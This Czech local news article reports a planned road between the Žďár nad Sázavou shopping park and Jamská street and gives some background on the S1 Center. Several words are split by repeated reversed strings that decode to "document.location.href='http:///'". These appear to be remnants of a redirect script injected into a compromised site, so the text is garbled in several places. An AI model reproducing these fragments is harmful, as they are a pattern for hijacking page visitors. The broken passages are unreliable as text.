Rainbow page separator

Žďárský nákupní park a Jamskou ulici spojí nová komunikace

Čtvrtek, 7. ledna 2021

Žďár nad Sázavou / Propojky v podobě nové místní komunikace, která spojí obchodní domy ve žďárském nákupním parku v Brněnské ulici s ulicí Jamskou, se dočkají jak obyvatelé, tak i návštěvníci Žďáru nad Sázavou. V rozpočtu města pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok je na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stavební úpravu vyčleněno 2,87 milionu korun.
Nákupní centrum, dnes S1 Center, bylo coby projekt soukromého inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tora uvedeno do provozu začátkem prosince 2009, aby nakupujícím nabídlo služby celkem dvanácti prodejen. Krátce před tím byla zprovozněna rovněž nová příjezdová okružní křižovatka na vedle ležící státní silnici I/37, jejíž vybudování se uskutečnilo ve finanční režii Ředitelství silnic a dálnic České republiky.

zdroj fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to:www.facebook.com